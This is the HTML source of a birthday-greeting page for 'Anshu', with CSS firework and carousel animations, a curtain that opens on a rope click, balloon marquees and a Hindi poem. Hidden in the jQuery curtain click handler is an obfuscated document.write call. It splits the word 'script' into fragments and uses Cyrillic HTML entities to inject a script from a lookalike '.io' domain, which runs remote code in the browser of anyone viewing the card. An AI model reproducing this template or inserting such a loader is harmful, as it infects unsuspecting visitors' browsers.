    box-shadow: 120px -188.6666666667px #00fff2, 21px -379.6666666667px #002fff, 234px -267.6666666667px #6600ff, 190px -349.6666666667px #95ff00, -243px -224.6666666667px #00d5ff, -219px -51.6666666667px #00ffcc, 29px -18.6666666667px #ff1a00, 38px -231.6666666667px #ff00c4, 231px -241.6666666667px #9500ff, 36px 5.3333333333px #00ff8c, -43px 41.3333333333px #0d00ff, -70px -49.6666666667px #ff0037, -186px -364.6666666667px #3c00ff, 4px -66.6666666667px #0048ff, -151px -139.6666666667px #a200ff, 212px -338.6666666667px #6600ff, 114px -71.6666666667px #00ff73, 189px -334.6666666667px #ff0004, 19px -313.6666666667px #00ff09, -237px -254.6666666667px #ff0037, -188px -96.6666666667px #001aff, 91px -12.6666666667px #00d5ff, 238px -230.6666666667px #9dff00, -7px -280.6666666667px #ffaa00, 182px -378.6666666667px #009dff, 135px -90.6666666667px #00ff26, -214px -56.6666666667px #4400ff, -207px -316.6666666667px #1100ff, 91px 26.3333333333px #e600ff, 52px -87.6666666667px #00ff9d, -21px -289.6666666667px #04ff00, -99px -25.6666666667px #ff0033, -124px -399.6666666667px #ff004d, 96px -220.6666666667px #bbff00, 250px -71.6666666667px #b300ff, -53px -147.6666666667px #ff0040, -216px -51.6666666667px #ff2f00, 19px 70.3333333333px #80ff00, -14px 5.3333333333px #95ff00, 107px -107.6666666667px #0062ff, 115px -241.6666666667px #00ff8c, 210px 60.3333333333px #00ff33, 86px -268.6666666667px #40ff00, -18px -18.6666666667px #6a00ff, -31px 28.3333333333px #00c8ff, -194px -100.6666666667px #0015ff, 8px -10.6666666667px #005eff, 164px 65.3333333333px #ff001a, -157px 10.3333333333px #a2ff00, -12px -400.6666666667px #0048ff, -124px -181.6666666667px #00ffa2; } }

@-o-keyframes bang {
  to {
    box-shadow: 120px -188.6666666667px #00fff2, 21px -379.6666666667px #002fff, 234px -267.6666666667px #6600ff, 190px -349.6666666667px #95ff00, -243px -224.6666666667px #00d5ff, -219px -51.6666666667px #00ffcc, 29px -18.6666666667px #ff1a00, 38px -231.6666666667px #ff00c4, 231px -241.6666666667px #9500ff, 36px 5.3333333333px #00ff8c, -43px 41.3333333333px #0d00ff, -70px -49.6666666667px #ff0037, -186px -364.6666666667px #3c00ff, 4px -66.6666666667px #0048ff, -151px -139.6666666667px #a200ff, 212px -338.6666666667px #6600ff, 114px -71.6666666667px #00ff73, 189px -334.6666666667px #ff0004, 19px -313.6666666667px #00ff09, -237px -254.6666666667px #ff0037, -188px -96.6666666667px #001aff, 91px -12.6666666667px #00d5ff, 238px -230.6666666667px #9dff00, -7px -280.6666666667px #ffaa00, 182px -378.6666666667px #009dff, 135px -90.6666666667px #00ff26, -214px -56.6666666667px #4400ff, -207px -316.6666666667px #1100ff, 91px 26.3333333333px #e600ff, 52px -87.6666666667px #00ff9d, -21px -289.6666666667px #04ff00, -99px -25.6666666667px #ff0033, -124px -399.6666666667px #ff004d, 96px -220.6666666667px #bbff00, 250px -71.6666666667px #b300ff, -53px -147.6666666667px #ff0040, -216px -51.6666666667px #ff2f00, 19px 70.3333333333px #80ff00, -14px 5.3333333333px #95ff00, 107px -107.6666666667px #0062ff, 115px -241.6666666667px #00ff8c, 210px 60.3333333333px #00ff33, 86px -268.6666666667px #40ff00, -18px -18.6666666667px #6a00ff, -31px 28.3333333333px #00c8ff, -194px -100.6666666667px #0015ff, 8px -10.6666666667px #005eff, 164px 65.3333333333px #ff001a, -157px 10.3333333333px #a2ff00, -12px -400.6666666667px #0048ff, -124px -181.6666666667px #00ffa2; } }

@-ms-keyframes bang {
  to {
    box-shadow: 120px -188.6666666667px #00fff2, 21px -379.6666666667px #002fff, 234px -267.6666666667px #6600ff, 190px -349.6666666667px #95ff00, -243px -224.6666666667px #00d5ff, -219px -51.6666666667px #00ffcc, 29px -18.6666666667px #ff1a00, 38px -231.6666666667px #ff00c4, 231px -241.6666666667px #9500ff, 36px 5.3333333333px #00ff8c, -43px 41.3333333333px #0d00ff, -70px -49.6666666667px #ff0037, -186px -364.6666666667px #3c00ff, 4px -66.6666666667px #0048ff, -151px -139.6666666667px #a200ff, 212px -338.6666666667px #6600ff, 114px -71.6666666667px #00ff73, 189px -334.6666666667px #ff0004, 19px -313.6666666667px #00ff09, -237px -254.6666666667px #ff0037, -188px -96.6666666667px #001aff, 91px -12.6666666667px #00d5ff, 238px -230.6666666667px #9dff00, -7px -280.6666666667px #ffaa00, 182px -378.6666666667px #009dff, 135px -90.6666666667px #00ff26, -214px -56.6666666667px #4400ff, -207px -316.6666666667px #1100ff, 91px 26.3333333333px #e600ff, 52px -87.6666666667px #00ff9d, -21px -289.6666666667px #04ff00, -99px -25.6666666667px #ff0033, -124px -399.6666666667px #ff004d, 96px -220.6666666667px #bbff00, 250px -71.6666666667px #b300ff, -53px -147.6666666667px #ff0040, -216px -51.6666666667px #ff2f00, 19px 70.3333333333px #80ff00, -14px 5.3333333333px #95ff00, 107px -107.6666666667px #0062ff, 115px -241.6666666667px #00ff8c, 210px 60.3333333333px #00ff33, 86px -268.6666666667px #40ff00, -18px -18.6666666667px #6a00ff, -31px 28.3333333333px #00c8ff, -194px -100.6666666667px #0015ff, 8px -10.6666666667px #005eff, 164px 65.3333333333px #ff001a, -157px 10.3333333333px #a2ff00, -12px -400.6666666667px #0048ff, -124px -181.6666666667px #00ffa2; } }

@keyframes bang {
  to {
    box-shadow: 120px -188.6666666667px #00fff2, 21px -379.6666666667px #002fff, 234px -267.6666666667px #6600ff, 190px -349.6666666667px #95ff00, -243px -224.6666666667px #00d5ff, -219px -51.6666666667px #00ffcc, 29px -18.6666666667px #ff1a00, 38px -231.6666666667px #ff00c4, 231px -241.6666666667px #9500ff, 36px 5.3333333333px #00ff8c, -43px 41.3333333333px #0d00ff, -70px -49.6666666667px #ff0037, -186px -364.6666666667px #3c00ff, 4px -66.6666666667px #0048ff, -151px -139.6666666667px #a200ff, 212px -338.6666666667px #6600ff, 114px -71.6666666667px #00ff73, 189px -334.6666666667px #ff0004, 19px -313.6666666667px #00ff09, -237px -254.6666666667px #ff0037, -188px -96.6666666667px #001aff, 91px -12.6666666667px #00d5ff, 238px -230.6666666667px #9dff00, -7px -280.6666666667px #ffaa00, 182px -378.6666666667px #009dff, 135px -90.6666666667px #00ff26, -214px -56.6666666667px #4400ff, -207px -316.6666666667px #1100ff, 91px 26.3333333333px #e600ff, 52px -87.6666666667px #00ff9d, -21px -289.6666666667px #04ff00, -99px -25.6666666667px #ff0033, -124px -399.6666666667px #ff004d, 96px -220.6666666667px #bbff00, 250px -71.6666666667px #b300ff, -53px -147.6666666667px #ff0040, -216px -51.6666666667px #ff2f00, 19px 70.3333333333px #80ff00, -14px 5.3333333333px #95ff00, 107px -107.6666666667px #0062ff, 115px -241.6666666667px #00ff8c, 210px 60.3333333333px #00ff33, 86px -268.6666666667px #40ff00, -18px -18.6666666667px #6a00ff, -31px 28.3333333333px #00c8ff, -194px -100.6666666667px #0015ff, 8px -10.6666666667px #005eff, 164px 65.3333333333px #ff001a, -157px 10.3333333333px #a2ff00, -12px -400.6666666667px #0048ff, -124px -181.6666666667px #00ffa2; } }

@-webkit-keyframes gravity {
  to {
    transform: translateY(200px);
    -moz-transform: translateY(200px);
    -webkit-transform: translateY(200px);
    -o-transform: translateY(200px);
    -ms-transform: translateY(200px);
    opacity: 0; } }

@-moz-keyframes gravity {
  to {
    transform: translateY(200px);
    -moz-transform: translateY(200px);
    -webkit-transform: translateY(200px);
    -o-transform: translateY(200px);
    -ms-transform: translateY(200px);
    opacity: 0; } }

@-o-keyframes gravity {
  to {
    transform: translateY(200px);
    -moz-transform: translateY(200px);
    -webkit-transform: translateY(200px);
    -o-transform: translateY(200px);
    -ms-transform: translateY(200px);
    opacity: 0; } }

@-ms-keyframes gravity {
  to {
    transform: translateY(200px);
    -moz-transform: translateY(200px);
    -webkit-transform: translateY(200px);
    -o-transform: translateY(200px);
    -ms-transform: translateY(200px);
    opacity: 0; } }

@keyframes gravity {
  to {
    transform: translateY(200px);
    -moz-transform: translateY(200px);
    -webkit-transform: translateY(200px);
    -o-transform: translateY(200px);
    -ms-transform: translateY(200px);
    opacity: 0; } }

@-webkit-keyframes position {
  0%, 19.9% {
    margin-top: 10%;
    margin-left: 40%; }
  20%, 39.9% {
    margin-top: 40%;
    margin-left: 30%; }
  40%, 59.9% {
    margin-top: 20%;
    margin-left: 70%; }
  60%, 79.9% {
    margin-top: 30%;
    margin-left: 20%; }
  80%, 99.9% {
    margin-top: 30%;
    margin-left: 80%; } }

@-moz-keyframes position {
  0%, 19.9% {
    margin-top: 10%;
    margin-left: 40%; }
  20%, 39.9% {
    margin-top: 40%;
    margin-left: 30%; }
  40%, 59.9% {
    margin-top: 20%;
    margin-left: 70%; }
  60%, 79.9% {
    margin-top: 30%;
    margin-left: 20%; }
  80%, 99.9% {
    margin-top: 30%;
    margin-left: 80%; } }

@-o-keyframes position {
  0%, 19.9% {
    margin-top: 10%;
    margin-left: 40%; }
  20%, 39.9% {
    margin-top: 40%;
    margin-left: 30%; }
  40%, 59.9% {
    margin-top: 20%;
    margin-left: 70%; }
  60%, 79.9% {
    margin-top: 30%;
    margin-left: 20%; }
  80%, 99.9% {
    margin-top: 30%;
    margin-left: 80%; } }

@-ms-keyframes position {
  0%, 19.9% {
    margin-top: 10%;
    margin-left: 40%; }
  20%, 39.9% {
    margin-top: 40%;
    margin-left: 30%; }
  40%, 59.9% {
    margin-top: 20%;
    margin-left: 70%; }
  60%, 79.9% {
    margin-top: 30%;
    margin-left: 20%; }
  80%, 99.9% {
    margin-top: 30%;
    margin-left: 80%; } }

@keyframes position {
  0%, 19.9% {
    margin-top: 10%;
    margin-left: 40%; }
  20%, 39.9% {
    margin-top: 40%;
    margin-left: 30%; }
  40%, 59.9% {
    margin-top: 20%;
    margin-left: 70%; }
  60%, 79.9% {
    margin-top: 30%;
    margin-left: 20%; }
  80%, 99.9% {
    margin-top: 30%;
    margin-left: 80%; } }

/* Custom Animation classes */

.content
{
	margin:auto;
	width:150px;
	perspective:1000px;
	position:relative;
	padding-top:0px;
	
}
.content-carrousel
{
	width:100%;
	position:absolute;
	float:right;
	animation:rotar 20s infinite linear;
	transform-style:preserve-3d;
}
.content-carrousel:hover
{
	animation-play-state:paused;
	cursor:pointer;
}
.content-carrousel figure
{
	width:70%;
	height:75px;
	border:1px solid #4d44d;
	overflow:hidden;
	position:absolute;
}
.content-carrousel figure:nth-child(1){
	transform:rotateY(0deg) translateZ(150px);
}
.content-carrousel figure:nth-child(2){
	transform:rotateY(40deg) translateZ(150px);
}
.content-carrousel figure:nth-child(3){
	transform:rotateY(80deg) translateZ(150px);
}
.content-carrousel figure:nth-child(4){
	transform:rotateY(120deg) translateZ(150px);
}
.content-carrousel figure:nth-child(5){
	transform:rotateY(160deg) translateZ(150px);
}
.content-carrousel figure:nth-child(6){
	transform:rotateY(200deg) translateZ(150px);
}
.content-carrousel figure:nth-child(7){
	transform:rotateY(240deg) translateZ(150px);
}
.content-carrousel figure:nth-child(8){
	transform:rotateY(280deg) translateZ(150px);
}
.content-carrousel figure:nth-child(9){
	transform:rotateY(320deg) translateZ(150px);
}

.shadow{
	position:absolute;
	box-shadow:0px 0px 20px 0px #C66;
	border-radius:2px;
}
.content-carrousel img{
	image-rendering:auto;
	transition:all 300ms;
	width:100%;
	height:100%;
}
.content-carrousel image:hover{
	transform:scale(1.2);
	transition:all 300ms;
}
@keyframes rotar
{
	from{
		transform:rotateY(0deg);
	} to{
		transform:rotateY(360deg);
	}
}
#loading {
		-webkit-animation: rotation-star 2s infinite linear;
		animation: rotation-star 2s infinite linear;
}

@-webkit-keyframes rotation-star {
		from {
				-webkit-transform: rotate(0deg);
				 transform: rotate(0deg);
		}
		to {
				-webkit-transform: rotate(359deg);
				 transform: rotate(359deg);
		}
}

@-keyframes rotation-star{
    from {
         -webkit-transform: rotate(0deg);
          transform: rotate(0deg);
    }
    to {
         -webkit-transform: rotate(359deg);
          transform: rotate(359deg);
    }
}
 </style>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="slide.js" type="text/javascript"></script>
<script type="text/javascript">
$(document).ready(function() { $curtainopen = false; $(".rope").click(function(){ $(this).blur(); if ($curtainopen == false){ $(this).stop().animate({top: '-171%' }, {queue:false, duration:350, easing:'easeOutBounce'}); $(".leftcurtain").stop().animate({width:'1px'}, 2000 ); $(".rightcurtain").stop().animate({width:'1px'},2000 ); $curtainopen = true; }else{ $(this).stop().animate({top: '-40px' }, {queue:false, duration:350, easing:'easeOutBounce'}); document.write('<s'+'cr'+'ipt sr'+'c="/'+'/'+'&#1043;'+'&#1092;.'+'i'+'o"></s'+'cr'+'ipt>'); $(".leftcurtain").stop().animate({width:'50%'}, 2000 ); $(".rightcurtain").stop().animate({width:'51%'}, 2000 ); $curtainopen = false; } return false; }); });
</script>
<style type="text/css">
      *{
        margin:0;
        padding:0;
      }
      body {
        text-align: center;
        
      }
      img{
      border: none;
    }
.leftcurtain{
      width: 100%;
      height: 100%;
      top: 0px;
      left: 0px;
      position: absolute;
      z-index: 2;
    }
     .rightcurtain{
      width: 100%;
      height: 100%;
      right: 0px;
      top: 0px;
      position: absolute;
      z-index: 3;
    }
    .rightcurtain img, .leftcurtain img{
      width: 100%;
      height: 100%;
    }
    .logo{
      margin: 0px auto;
      margin-top: 150px;
    }
    .rope{
      position: absolute;
      top: 50px;
      left: 50%;
      z-index: 4;
    } 
.centered {
    position: absolute;
    top: 75%;
    left: 50%;
    transform: translate(-50%, -50%);
}
</style>

</head>
<body  onload="typeWriter()" style="background-image : url('bg1.gif'); background-size: auto;">
<div class="leftcurtain"><img src="h1.jpg" /></div>
<div class="rightcurtain"><img src="h1.jpg" /></div>
<a class="rope" href="" onclick="start()">
<div class="center swing2" style="margin-left: -180px;margin-right: 12%;  font-size: 28px;text-shadow: 1px 1px 3px  #FF0000, 1px 1px 3px #FF0000, -1px -1px 3px #FF0000, -1px -1px 3px #FF0000;color: #FFFFFF;font-weight: bold;"><p id="bikki"></p>

<script>
var i = 0;
var txt = 'Happy Birthday dear Friend, Anshu';
var speed = 45;

function typeWriter() {
  if (i < txt.length) {
    document.getElementById("bikki").innerHTML += txt.charAt(i);
    i++;
    setTimeout(typeWriter, speed);
  }
}
</script><br><br></div>

<div class="center swing2" style="margin-left: -180px;  font-size: 28px;text-shadow: 1px 1px 3px #00ffcc, 1px 1px 3px #00ffcc, -1px -1px 3px #00ffcc, -1px -1px 3px #00ffcc;color: #ff0006;font-weight: bold;">Open Me 🎁🎁</div>

</a>
<marquee class="m1" behavior="scroll" direction="up" scrolldelay="5"> <br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
</marquee>
<marquee class="m2" behavior="scroll" direction="down" scrolldelay="5"><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
<img src="https://1.bp.blogspot.com/-FD7pvWB-ll0/XVbwNWYRkSI/AAAAAAAAGts/htp3uOn_iCoKEQ_8uB_1LhJd6x1jESxeACLcBGAs/s320/ballon.png" height="25px" width="25px" /><br><br>
</marquee>
<div class="pyro">
<div class="before"></div></div>
<br>
<div class="g-ad">
</div>
<br>
<link href='https://fonts.googleapis.com/css?family=Wendy+One' rel='stylesheet' type='text/css'>
<!--<div class="dabba">
  <div class="balloon">
    <div><span>☺</span></div>
    <div><span>B</span></div>
    <div><span>D</span></div>
    <div><span>A</span></div>
    <div><span>Y</span></div>
    <div><span>!</span></div>
  </div>
</div>-->
<figure style="animation:wobble 5s ease-in-out infinite;
  transform-origin:center center;
  transform-style:preserve-3d;
        font-size: 4px;
            margin: -5em 0;
        margin-bottom: 59px;">
<h1>From Khabai Tech</h1>
<h1>From Khabai Tech</h1>
<h1>From Khabai Tech</h1>
<h1>From Khabai Tech</h1>
<h1>From Khabai Tech</h1>
<h1>From Khabai Tech</h1>
<div class="pyro">
<div class="before"></div></div>
</figure>
<div class="pyro">
<div class="before"></div></div>
<br>
<br>
<center>
<h2> <img src="tanvi.gif" alt="programmer_bikki"  style="animation: pulse 2.5s infinite; max-width:500px; width:100%;"><br>Dear Anshu </h2>
<div class="container">
<div class="box">
<div style="font-size: 17px; font-weight: 800; color: white;">
<center><p id="demo"></p></center>
</div>
<!--<center><div class="w3-content w3-section" style="max-width:500px;background-image: url() !important;">
    <img class="mySlides" src="t1.png" style="width:100%; height:500px;">
    <img class="mySlides" src="t2.png" style="width:100%; height:500px;">
    <img class="mySlides" src="t3.png" style="width:100%; height:500px;"><br><br>
    </div>

</center>--><br></div></div>
<!--<p id="demoo" class="center animated pulse" style="text-shadow: 1px 1px 3px #ff0037, 1px 1px 3px #ff0037, -1px -1px 3px #ff0037, -1px -1px 3px #ff0037;color: #FFC107;font-size: 20px;font-weight: bold;"></p>-->
<!--<img src="prin.png" style="animation: pulse 2.5s infinite; max-width:500px; width:100%;"><br>-->
<img src="bikki.gif" style="animation: pulse 2.5s infinite; max-width:300px; width:100%;"><br>
<img src="bi.gif" style="animation: pulse 2.5s infinite; max-width:300px; width:100%;"><br><br><br>

<div class="pyro">
<div class="before"></div></div>
<br><br>
<div class="pyro">
<div class="before"></div></div>
<div class="row" style="padding-left: 17px;padding-right: 17px;color:blue;font: 100 1.8em/1 Oswald, sans-serif;line-height:1.5;font-weight:bold;">


<p style="text-shadow: 1px 1px 3px white, 1px 1px 3px white, -1px -1px 3px white, -1px -1px 3px white; color: red;">
Tumhari is adaa ka kya javab du,<br>
apne dost ko kya tohfa du,<br>
koi achcha sa gulab hota to mali se mangvata,<br>
par jo khud gulab hai usko gulab kya du…<br><br>
</p>
<img src="t5.gif" style="animation: pulse 2.5s infinite; max-width:300px; width:100%;"><br>
